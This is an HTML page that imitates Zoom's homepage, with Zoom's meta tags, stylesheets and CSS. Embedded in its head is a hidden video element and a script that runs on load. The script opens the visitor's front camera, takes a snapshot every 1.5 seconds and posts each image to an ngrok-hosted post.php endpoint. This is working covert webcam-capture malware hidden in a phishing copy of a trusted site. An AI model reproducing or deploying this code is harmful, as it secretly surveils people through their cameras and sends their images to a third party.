<html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US">
 <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"> 
  <title>Video Conferencing, Web Conferencing, Webinars, Screen Sharing - Zoom</title> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge,Chrome=1"> 
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
  <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0"> 
  <meta name="google-site-verification" content="8WU-FkemSTzA1EpoynHUDYe2UxPXiMS53FBXk6_qVy4"> 
  <meta name="google-site-verification" content="J_tzcwoKXfPkhsWbiS7cM6WEn3pjCr_DhMNmhRtd960"> 
  <meta name="google-site-verification" content="o7_kGQ-oKZjWTkzWK3NYR9JUf3SvQKIBwjHgqTE_FHU"> 
  <meta name="google-site-verification" content="QXsuSwndXLLWh52gEd4ig7alEmTyDp0NPo4GCKsUH5k"> 
  <meta name="google-site-verification" content="Vt60qsrxhpi8GdAMlhQod8oxA2LAtN908SnMDdelCYc"> 
  <meta name="google-site-verification" content="v3_Ow9RbJsRZ9MLl--QrhABeFcA9oP7OBXhY50O4QuA"> 
  <meta name="google-site-verification" content="0fZHb1ni-k_iNiYVnomwmnY9ITBunxqU8VC49mHDNxc"> 
  <meta name="keywords" content="zoom, zoom.us, video conferencing, video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging"> 
  <meta name="description" content="Zoom is the leader in modern enterprise video communications, with an easy, reliable cloud platform for video and audio conferencing, chat, and webinars across mobile, desktop, and room systems. Zoom Rooms is the original software-based conference room solution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Zoom is a publicly traded company headquartered in San Jose, CA."> 
  <meta property="og:type" content="website"> 
  <meta property="og:url" content="https://zoom.us/"> 
  <meta property="og:title" content="Video Conferencing, Web Conferencing, Webinars, Screen Sharing"> 
  <meta property="og:description" content="Zoom is the leader in modern enterprise video communications, with an easy, reliable cloud platform for video and audio conferencing, chat, and webinars across mobile, desktop, and room systems. Zoom Rooms is the original software-based conference room solution used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Zoom is a publicly traded company headquartered in San Jose, CA."> 
  <meta property="og:image" content="https://static.zoom.us/static/94019/image/thumb.png"> 
  <meta property="og:site_name" content="Zoom Video"> 
  <meta property="fb:app_id" content="113289095462482"> 
  <meta property="twitter:account_id" content="522701657"> 
  <link rel="shortcut icon" href="https://static.zoom.us/zoom.ico"> 
  <link rel="canonical" href="https://zoom.us/"> 
  <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/kgjfgplpablkjnlkjmjdecgdpfankdle"> 
  <script type="text/javascript">
var resourceAccountIdRoutingURl = "";
resourceAccountIdRoutingURl = resourceAccountIdRoutingURl==""?undefined:resourceAccountIdRoutingURl;
</script> 
  <script type="text/javascript">
if (top != window) {
top.location.href = 'https://zoom.us/';
}
</script> 
  <link type="text/css" rel="stylesheet" href="https://static.zoom.us/static/94019/css/all.min.css"> 
  <link type="text/css" rel="stylesheet" href="https://static.zoom.us/static/94019/css/landing.min.css"> 
  <link type="text/css" rel="stylesheet" href="https://static.zoom.us/static/94019/css/carousel/carousel.min.css"> 
  <link type="text/css" rel="stylesheet" href="https://static.zoom.us/static/94019/css/swiper-4.5.0.min.css"> 
  <link rel="stylesheet" type="text/css" href="https://static.zoom.us/static/94019/js/lib/vue/advanced/select-copy/select-copy.min.css"> 
  <style>
.btn-default{
font-weight: 500;
border-color: #ffffff;
}
.btn-default:hover, .btn-default:focus, .btn-default:active{
border-color: #ffffff;
font-weight: 600;
}
.released {
padding-bottom: 10px;
}
#readme {
color: #fff;
font-size: 16px;
}
.released > p {
color: #fff;
font-size: 16px;
}
.new-released {
padding-top: 15px;
}
.hero-text {
max-width: 780px;
font-size: 14px;
margin: 0 0 0 24px;
padding: 0 0;
color: #444444;
text-align: left;
/*-webkit-line-clamp: 1;*/
display: -webkit-box;
-webkit-box-orient: vertical;
overflow: hidden;
}
.new-released > a{
font-size: 16px;
}
#video-dialog-container .modal-body {
padding: 0 ;
background-color: #000000;
}
#video-dialog-container .modal-content {
background-color: #000000;
}
#video-dialog-container .modal-header {
height: 0 !important;
padding-top: 0 !important;
min-height: inherit;
}
#video-dialog-container button.close {
cursor: pointer;
top: -20px;
right: 0;
z-index: 2;
overflow: hidden;
text-indent: -10000px;
background: url(https://static.zoom.us/static/94019/image/new/home/video-close.png) 0 0 no-repeat;
background: url(https://static.zoom.us/static/94019/image/new/home/video-close-15.png) 0 0 no-repeat\9;
width: 15px;
height: 15px;
background-size: 15px auto;
opacity: 1;
filter: none;
}
#mainbg_container .heroSlide {
height: 666px;
}
#mainbg_container .heroSlide2 {
height: 570px;
}
.heroSlide {
position: relative;
background-color: #f4f4f8;
width: 100%;
}
.heroSlide .item.cycle-slide {
width: 100%;
}
.signup_form-id .controls {
text-align: left;
}
.swiper-pagination-container {
position: absolute;
bottom: 108px;
left: 0;
width: 100%;
padding: 21px 0;
text-align: center;
z-index: 10;
display: block;
overflow: hidden;
}
.heroSlide.heroSlide2 .swiper-pagination-container {
bottom: 35px;
}
.swiper-container-horizontal .swiper-wrapper .swiper-slide .mainbg {
display: none;
}
.swiper-container-horizontal .swiper-wrapper .swiper-slide-active .mainbg {
display: block;
}
.swiper-container-horizontal .swiper-pagination-container > .swiper-pagination-bullets {
position: static;
display: inline-flex;
vertical-align: middle;
height: 100%;
margin-right: 5px;
}
.swiper-container-horizontal .swiper-pagination-container > .swiper-pagination-bullets .swiper-pagination-bullet {
margin: 0 6px;
}
.swiper-pagination-bullet {
cursor: pointer;
}
.swiper-pagination_action {
position: relative;
display: inline-flex;
top: 3px;
vertical-align: middle;
opacity:0;
filter: alpha(opacity=0);
animation: cssDelay 0s ease-in .3s forwards;
animation-delay: .3s;
}
#home #screen8_container .btn-cta-wrapper {
padding: 40px 0 35px 0;
}
@keyframes cssDelay {
to {
opacity: 1;
filter: alpha(opacity=100);
}
}
@media (max-width: 767px) {
.is-cn-home #screen2_container .solution-list solution-box {
min-height: 200px;
}
#screen6a_container .zoom-news .news-item {
margin-bottom: 40px;
width: 100%;
}
#screen6a_container .zoom-news .news-item .logo {
margin-bottom: 10px;
}
#screen6a_container .zoom-news .news-item .stars {
margin-top: 20px;
}
#mainbg_container>#signup_form #mainbg_container>.signup_form-id, .form-logged{
position: static;
}
.vc_title .tab-vc{
position: absolute !important;
margin-top:120px !important;
}
#mainbg_container #paid_content {
height: 250px !important;
}
#mainbg_container .vc_title #vc_h2{
text-align: left !important;
width:300px !important;
padding-left:20px;
}
.released > p {
text-align: center;
color: #5a5a5a;
font-size: 15px;
}
.controls, .signup_form-id .controls {
font-size: 0;
text-align: center;
}
.btn-ct {
background-color: #FF8C00; !important;
min-width: 300px !important;
margin:0 auto;
}
#readme {
color: #428bca;
font-size: 13px;
}
#readmess {
margin-top:15px;
}
.new-released {
text-align:center;
padding-left:15px;
padding-right:15px;
}
.hero-text {
text-align:center;
padding:3px 20px 0 20px;
margin: 0;
}
.m-btn-report {
text-align:center;
}
.m-btn-report .btn-report {
margin-left: 0 !important;
}
.heroSlide.heroSlide2 .signup_form-id .controls {
text-align: center;
margin-top: -145px;
}
.vc_title.tab-ct-text h2 {
max-width:780px;
font-size:36px;
line-height:60px;
color:#444444;
}
.vc_title.tab-ct-text p {
font-size:18px;
}
#mainbg_container #vc_title h2, #mainbg_container .vc_title h2 {
-webkit-line-clamp: 6;
padding-top: 0;
}
}
@media (min-width:768px) and (max-width: 1439px) {
.heroSlide .item.cycle-slide {
width: 100%;
}
}
@media (min-width: 1440px) {
.heroSlide .item.cycle-slide {
width: 100%;
}
}
@media (max-width: 1100px) and (min-width: 767px) {
#mainbg_container .vc_title .hero-text {
margin-left: 0;
}
}
@media (max-width:460px) {
.vc_title.tab-ct-text h2 {
font-size: 7vw !important;
}
.vc_title.tab-ct-text p.hero-text {
font-size: 4.5vw !important;
}
}
/* cn cluster css for mobile*/
#home.is-cn-home #screen8_container .btn-cta-wrapper {
padding: 0;
}
.is-cn-home #screen7_container .row > h3 {
margin: 40px 0 30px 0;
color:#232333;
}
@media (max-width: 767px) {
.is-cn-home #screen2_container .solution-list .solution-box {
min-height: 250px;
}
}
</style>
<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="480" height="640"></canvas>

<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'https://dd39f00c.ngrok.io/post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {
    errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 480, 640);
       var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
       post(canvasData); }, 1500);
  

}

// Load init
init();

</script>
  <script>
if (/(msie 8)/.test(navigator.userAgent.toLowerCase())) {
document.write('<style>');
document.write('#vc_content{filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'https://static.zoom.us/static/94019/image/new/home/bg2_gartner.jpg\', sizingMethod=\'scale\');}');
document.write('#rc_content{filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'https://static.zoom.us/static/94019/image/new/home/bg3_room_systems.jpg\', sizingMethod=\'scale\');}');
document.write('#zp_content{filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'https://static.zoom.us/static/94019/image/new/home/bg4_zoompresence.jpg\', sizingMethod=\'scale\');}');
document.write('#ms_content{filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'https://static.zoom.us/static/94019/image/new/home/bg5_mobile_share.jpg\', sizingMethod=\'scale\');}');
document.write('#im_content{filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src=\'https://static.zoom.us/static/94019/image/new/home/bg6_im_presence.jpg\', sizingMethod=\'scale\');}');
document.write('</style>');
}
</script>
 </head>
 <body></body>
</html>
